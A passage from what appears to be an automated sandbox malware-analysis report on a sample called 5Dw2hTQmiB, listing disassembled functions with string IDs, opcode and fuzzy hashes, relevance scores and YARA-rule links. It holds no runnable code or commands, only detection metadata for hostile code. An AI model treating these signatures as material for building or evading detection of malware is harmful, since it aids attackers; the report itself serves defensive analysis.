                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0$Y!N#$b$j$tQpS
                                                                        • API String ID: 0-1561506603
                                                                        • Opcode ID: 45c243cf0ca8e2274e85070ecb056509f0a7305c0b5d6953bfe836e1f2057ffa
                                                                        • Instruction ID: a8a7a29e98a6c84b0bf015027c931471bd271533aad50a55ef7f488bc3eb4ed8
                                                                        • Opcode Fuzzy Hash: 45c243cf0ca8e2274e85070ecb056509f0a7305c0b5d6953bfe836e1f2057ffa
                                                                        • Instruction Fuzzy Hash: 031204B02083819BE724CF15C4A4B6FBBE2BBC5308F54AD1DE5968B391D779D809CB52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EE4EA7 Relevance: 5.5, Strings: 4, Instructions: 498COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: )$IDAT$IEND$IHDR
                                                                        • API String ID: 0-3181356877
                                                                        • Opcode ID: 8a7d19e3304fb962131ac192d74715622dc9e54721aa8770317e2bbf55eb4353
                                                                        • Instruction ID: 0ca62c152d9e4b885aecffcf4f730c4fd1cb8eb6ae2ddf4e0dd20f2561616b8f
                                                                        • Opcode Fuzzy Hash: 8a7d19e3304fb962131ac192d74715622dc9e54721aa8770317e2bbf55eb4353
                                                                        • Instruction Fuzzy Hash: E41226B16483408FDB08CF28CC9076ABBE1EF85304F45D5ADE9869B392D375D909CB96
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02F1B6D7 Relevance: 4.1, Strings: 3, Instructions: 313COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: R-,T$R-,T$gxyz
                                                                        • API String ID: 0-1473045628
                                                                        • Opcode ID: 8485a954022714466d637d1ec12eb6bb83b8405d43bd8df9d8595431355dead1
                                                                        • Instruction ID: 4874aa78217a00b4655111030f30cd045fbdb41bb82813e3b3b6096a8a27d0c5
                                                                        • Opcode Fuzzy Hash: 8485a954022714466d637d1ec12eb6bb83b8405d43bd8df9d8595431355dead1
                                                                        • Instruction Fuzzy Hash: 28A1B072A04312DBD715CF18C890B6BB7E2FF84768FA9861CE9955B390D731E815CB82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043B470 Relevance: 4.1, Strings: 3, Instructions: 313COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: R-,T$R-,T$gxyz
                                                                        • API String ID: 0-1473045628
                                                                        • Opcode ID: b454b81ec58fb32b7044130ad093cd26634e40bc288812ca2cb254cd389e0762
                                                                        • Instruction ID: d43682651e4d1bbcca935c21765318abaecc161b347944d4f0b38a11893cb63e
                                                                        • Opcode Fuzzy Hash: b454b81ec58fb32b7044130ad093cd26634e40bc288812ca2cb254cd389e0762
                                                                        • Instruction Fuzzy Hash: 77A1BC726043129BC715CF18C49076BB7A2FF88324F29961EE9959B391D738EC15CBCA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EE092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .$GetProcAddress.$l
                                                                        • API String ID: 0-2784972518
                                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                        • Instruction ID: e99084117a57961017f850d8ae13b12b8971232c0422d51952033c3b6dc5f80a
                                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                        • Instruction Fuzzy Hash: 133149B6900609DFDB11CF99C880AAEBBF5FF58328F14904AD442B7210D7B1EA45CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02F053EA Relevance: 3.6, Strings: 2, Instructions: 1113COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: = 'Q$cfbe
                                                                        • API String ID: 0-911374196
                                                                        • Opcode ID: c7ed6d1a98b6f5c28f2481b07727322aa0001425e910c350d4d0536391605174
                                                                        • Instruction ID: 73224664c58df5f47b73e48b7bfcefe803b5acb3fe3af600d5962ace016f525b
                                                                        • Opcode Fuzzy Hash: c7ed6d1a98b6f5c28f2481b07727322aa0001425e910c350d4d0536391605174
                                                                        • Instruction Fuzzy Hash: 73925C70545B808EE725CB34C4A4BE2BBE1BF17348F84099CD5EB8B682C7BAA505DB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EE5AF7 Relevance: 3.4, Strings: 2, Instructions: 859COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0$8
                                                                        • API String ID: 0-46163386
                                                                        • Opcode ID: 05554e331a898ce3e5d2d28d30dc6842799560a7bfe6e8c337d7132d452b72d2
                                                                        • Instruction ID: 2b072719469b98f807a09ab177d1b03b45f3cadee9d8e61fca691d4b7a3ff557
                                                                        • Opcode Fuzzy Hash: 05554e331a898ce3e5d2d28d30dc6842799560a7bfe6e8c337d7132d452b72d2
                                                                        • Instruction Fuzzy Hash: 08727C716083409FDB24CF18C890B9BBBE1BF98318F44992DF99A8B391D775D944CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405890 Relevance: 3.4, Strings: 2, Instructions: 859COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0$8
                                                                        • API String ID: 0-46163386
                                                                        • Opcode ID: 985693532302c4506e6fbfa9ecab3ea888a96725eb91a0057102c6fe57a661ce
                                                                        • Instruction ID: 7837933baec6aab5fa89fe771a39ae18291e4d1537fcbd2309299e9b3d0cbab1
                                                                        • Opcode Fuzzy Hash: 985693532302c4506e6fbfa9ecab3ea888a96725eb91a0057102c6fe57a661ce
                                                                        • Instruction Fuzzy Hash: B37236716083409FDB24CF18C880B9BBBE1AF98314F14892EF9899B391D779D954CF96
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02F070CE Relevance: 3.3, Strings: 2, Instructions: 794COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: OKGV$cDEG
                                                                        • API String ID: 0-3344514456
                                                                        • Opcode ID: 5c4e20b1cb1002911b0e13d38f56e643dc60e23d1d023b114e9d07b977b17b11
                                                                        • Instruction ID: 181a355e088b0c974bcc202fe4f8578f63eb711af3ed54c006028551029143d5
                                                                        • Opcode Fuzzy Hash: 5c4e20b1cb1002911b0e13d38f56e643dc60e23d1d023b114e9d07b977b17b11
                                                                        • Instruction Fuzzy Hash: 2C529A70604B818BE329CF29C4907A7FBE2BF56348F548A9DC5E68BB85C335B409DB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00426E67 Relevance: 3.3, Strings: 2, Instructions: 794COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: OKGV$cDEG
                                                                        • API String ID: 0-3344514456
                                                                        • Opcode ID: ce0c762cc83a90b3b7cfd4b025565d65a9b4a49c97eb1469e97f8a494a7851d4
                                                                        • Instruction ID: c28369ffc2cf0640dc7f58727e984682e1f370175af9b66c4cf116e2671c74ed
                                                                        • Opcode Fuzzy Hash: ce0c762cc83a90b3b7cfd4b025565d65a9b4a49c97eb1469e97f8a494a7851d4
                                                                        • Instruction Fuzzy Hash: 9952BD70208B518BE335CF29D4907A3BBE2BF56304F944A5ED4E68BB85D339B409CB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02F021E7 Relevance: 2.9, Strings: 2, Instructions: 369COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: A\]D$vSUN
                                                                        • API String ID: 0-3118794373
                                                                        • Opcode ID: 03feea6e1d589d380401754c7725727d6d3627a4905a7b22f6b6df05ed48b411
                                                                        • Instruction ID: afe1bc956d8e7731f7fe1dbdec22c9bbbd48599aeb93e19b784136481833b08d
                                                                        • Opcode Fuzzy Hash: 03feea6e1d589d380401754c7725727d6d3627a4905a7b22f6b6df05ed48b411
                                                                        • Instruction Fuzzy Hash: E3C1A9B1A083419FD710CF58C89472BF7E1EF89398F54892CEA859B381D735D805DBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EF70D0 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: /9++$756.
                                                                        • API String ID: 0-2948954884
                                                                        • Opcode ID: 7ee79a046eb4157686be4d9f50bcc8fda8102fc623c5d9beae8a7122bfe23570
                                                                        • Instruction ID: 12bddd5eb31ccf24bd6904767d75dc53b080f1dc4fd69d731d86b065c0beb65b
                                                                        • Opcode Fuzzy Hash: 7ee79a046eb4157686be4d9f50bcc8fda8102fc623c5d9beae8a7122bfe23570
                                                                        • Instruction Fuzzy Hash: 50B1BD70544B818BE369CF24C4A17A3FBE2BF86318F149A4DC5EB4BB91C735A446CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00416E69 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: /9++$756.
                                                                        • API String ID: 0-2948954884
                                                                        • Opcode ID: a014cfe3effdd53ad0569a5c0da46c576056ff92ac18762d3f8e3a7eb364fc7e
                                                                        • Instruction ID: cbd01cd0f0e0f6a1cd8aef29ed4a15310b76b2b422a9a27135592bbd613474a8
                                                                        • Opcode Fuzzy Hash: a014cfe3effdd53ad0569a5c0da46c576056ff92ac18762d3f8e3a7eb364fc7e
                                                                        • Instruction Fuzzy Hash: CAB1A070508B418BD329CF35C0A17A3BBE2BF96354F148A5EC0E74B791C739A486CB99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02F01517 Relevance: 2.8, Strings: 2, Instructions: 263COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: s}$EBC
                                                                        • API String ID: 0-541026534
                                                                        • Opcode ID: 6ddf01aa1ffdadc8da86c39f90ddd0bfc30155f55a5fbfb5c877fdaf387ca4af
                                                                        • Instruction ID: 26603f0b31bc156ed23b24cbe9b85fb5db625a310d50ec0e4731db8ba2875553
                                                                        • Opcode Fuzzy Hash: 6ddf01aa1ffdadc8da86c39f90ddd0bfc30155f55a5fbfb5c877fdaf387ca4af
                                                                        • Instruction Fuzzy Hash: B59168B15083418BD724CF14C890B6BBBF1FF86358F148A1CE5A69B391E779D909CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02F1873D Relevance: 2.6, Strings: 2, Instructions: 138COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: D1B7$D1B7
                                                                        • API String ID: 0-2576811906
                                                                        • Opcode ID: 60bdf6df0d9da367abe9cafd864840737e1feb61e3c6acb89e3bd56984f3b0f9
                                                                        • Instruction ID: 62c058a5382f635284add518e567fad64d11c911067930f2c4c28164b506d582
                                                                        • Opcode Fuzzy Hash: 60bdf6df0d9da367abe9cafd864840737e1feb61e3c6acb89e3bd56984f3b0f9
                                                                        • Instruction Fuzzy Hash: B75147B4509302ABD708CF10DDA172BBBE2BBC6784F54992CE4855B350E7B58D05EB8A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02F166E7 Relevance: 1.9, Strings: 1, Instructions: 632COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: &QPS
                                                                        • API String ID: 0-2176464483
                                                                        • Opcode ID: 46f4230af82bee1de83ac0e6d75915a69e2b879e8969acc8d095cf8940907a8d
                                                                        • Instruction ID: 7ae7b1edb6e0596ae6d5fba4e890f1c292619d453e871709ab0f1954ed1aaf59
                                                                        • Opcode Fuzzy Hash: 46f4230af82bee1de83ac0e6d75915a69e2b879e8969acc8d095cf8940907a8d
                                                                        • Instruction Fuzzy Hash: 2A329AB16083419FD714CF18C890B2EBBE6BFC9358F588A2CE6959B391D735E805CB52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00436480 Relevance: 1.9, Strings: 1, Instructions: 632COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: &QPS
                                                                        • API String ID: 0-2176464483
                                                                        • Opcode ID: 65a96fd98fad50260486e3f0be8555261ef3fd4ad64a9413a3ad0717fdc6aefb
                                                                        • Instruction ID: 25e0a39614117acd251c425f8fc7da8ea54aac9487c31c541127f9c115a88d76
                                                                        • Opcode Fuzzy Hash: 65a96fd98fad50260486e3f0be8555261ef3fd4ad64a9413a3ad0717fdc6aefb
                                                                        • Instruction Fuzzy Hash: D8327C71608342AFD714CF18C59072FBBE1BB89308F299A2DE4D597391D739E805CB9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EF5DBE Relevance: 1.7, Strings: 1, Instructions: 431COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: v
                                                                        • API String ID: 0-1801730948
                                                                        • Opcode ID: 065b0362184322e70347aa1468ee54d6b454311281bc63e7ad54eb8d13dc1da2
                                                                        • Instruction ID: b845d26cf839ea119b75e8ec9ecc09a890acc6de6df0ed59b1fe59ac9fb4bf8f
                                                                        • Opcode Fuzzy Hash: 065b0362184322e70347aa1468ee54d6b454311281bc63e7ad54eb8d13dc1da2
                                                                        • Instruction Fuzzy Hash: 94E1ACB15483819FD324CF14C490B5BBBE2AFD5308F58CA2DE5A98B392E735D849CB52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02F07190 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: OKGV
                                                                        • API String ID: 0-2748110933
                                                                        • Opcode ID: 68b20ac99494e757251efaa59fb5d3cfc99ae37d895fe641597ca6f6139cc955
                                                                        • Instruction ID: 6d118d5186444a1ede3cf32f9f8dbb1266560aae901ecfacf8db8e1dac291d41
                                                                        • Opcode Fuzzy Hash: 68b20ac99494e757251efaa59fb5d3cfc99ae37d895fe641597ca6f6139cc955
                                                                        • Instruction Fuzzy Hash: C8F18A70605B818BE339CF29C0907A7FBE2BF56348F588AADC4EA4B685C735B405DB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00426F29 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: OKGV
                                                                        • API String ID: 0-2748110933
                                                                        • Opcode ID: 68b20ac99494e757251efaa59fb5d3cfc99ae37d895fe641597ca6f6139cc955
                                                                        • Instruction ID: 916d0c031c06b9ff90a82f4d1f29d6ecfa34e58a1d746ce2bb30e38e567cbd36
                                                                        • Opcode Fuzzy Hash: 68b20ac99494e757251efaa59fb5d3cfc99ae37d895fe641597ca6f6139cc955
                                                                        • Instruction Fuzzy Hash: 8DF1AD70209B518BE335CF25D0907A3BBE2BF56304F984A6ED4EA4B785C739B409CB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02F07207 Relevance: 1.6, Strings: 1, Instructions: 367COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: OKGV
                                                                        • API String ID: 0-2748110933
                                                                        • Opcode ID: ea7c35e52e94e3c7291e41587c5b283a95bb277f307c52ed02ae189e6c98f3a2
                                                                        • Instruction ID: 1b72c4f96f7eadad3bccef00dc228d57d8aa7d82fcb19fcb00d2508ae20a1c06
                                                                        • Opcode Fuzzy Hash: ea7c35e52e94e3c7291e41587c5b283a95bb277f307c52ed02ae189e6c98f3a2
                                                                        • Instruction Fuzzy Hash: 5FD1BD70645B818BE335CB25C0A0BE7FBE2BF96348F584A9DC4EA0B685C339B405DB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00426FA0 Relevance: 1.6, Strings: 1, Instructions: 367COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: OKGV
                                                                        • API String ID: 0-2748110933
                                                                        • Opcode ID: ea7c35e52e94e3c7291e41587c5b283a95bb277f307c52ed02ae189e6c98f3a2
                                                                        • Instruction ID: d84f4f6929edb4684b5bf680aeb5b803cd6ef669a441a97407e46d428c6448fb
                                                                        • Opcode Fuzzy Hash: ea7c35e52e94e3c7291e41587c5b283a95bb277f307c52ed02ae189e6c98f3a2
                                                                        • Instruction Fuzzy Hash: EBD1AC70209B618BE335CF35D0907A3BBE2BF92304F984A5ED4EA4B785C739A409CB55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EFBB97 Relevance: 1.6, Strings: 1, Instructions: 325COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 789:
                                                                        • API String ID: 0-2924019492
                                                                        • Opcode ID: 8b794405c131f09e8e34bb99c24ed95e91bb4a565b4e658581287d18face041e
                                                                        • Instruction ID: ec63b06dd56bfafc6a48fb7719d2fd142bcf173fe7eb136f076eb51997063cf8
                                                                        • Opcode Fuzzy Hash: 8b794405c131f09e8e34bb99c24ed95e91bb4a565b4e658581287d18face041e
                                                                        • Instruction Fuzzy Hash: B58105B2A443019BDB24DF14CC91B7B73A5EF8936CF09951CEA958B291F336D901CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041B930 Relevance: 1.6, Strings: 1, Instructions: 325COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 789:
                                                                        • API String ID: 0-2924019492
                                                                        • Opcode ID: b996def426ce6c93dfb3c0d2b8574bf75d36e5b31bc495960c58811c0470f269
                                                                        • Instruction ID: 418ff68b172b6724851a5f9b45def2009d2e8c16223b2686ec42ef28e0ca92a7
                                                                        • Opcode Fuzzy Hash: b996def426ce6c93dfb3c0d2b8574bf75d36e5b31bc495960c58811c0470f269
                                                                        • Instruction Fuzzy Hash: F981D1B1A042059BDB24DF14C892BBB73B4EF85324F08452DE9959B391E738ED41C7EA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EFB507 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ?mlk
                                                                        • API String ID: 0-3660313571
                                                                        • Opcode ID: 216352202639316bdb986b005ec30376d3a140eb21c34a0285974a7dcc1e0690
                                                                        • Instruction ID: cb9fdd0ccac6c7e635444a3fa0b79eab508f7db09f5fa7fe43258132f456988e
                                                                        • Opcode Fuzzy Hash: 216352202639316bdb986b005ec30376d3a140eb21c34a0285974a7dcc1e0690
                                                                        • Instruction Fuzzy Hash: AD81D2B16442108BDB24DF18C892B7A73F2EF9936CF19965CE9924B3E0E735D901C7A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041B2A0 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ?mlk
                                                                        • API String ID: 0-3660313571
                                                                        • Opcode ID: 69b391067aedde1dc5241c6d9153a3fd8a133c152dfaad8eff51354b77e8172c
                                                                        • Instruction ID: 01c671782572adc667358f00788eb460e8e2c42b2d22e52cc5728f6b1ee1f78b
                                                                        • Opcode Fuzzy Hash: 69b391067aedde1dc5241c6d9153a3fd8a133c152dfaad8eff51354b77e8172c
                                                                        • Instruction Fuzzy Hash: 8D8105B15042148BDB14DF18C892BBB73B2EF95328F18825EE8964B391E739D845C7E6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02F1B397 Relevance: 1.5, Strings: 1, Instructions: 292COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
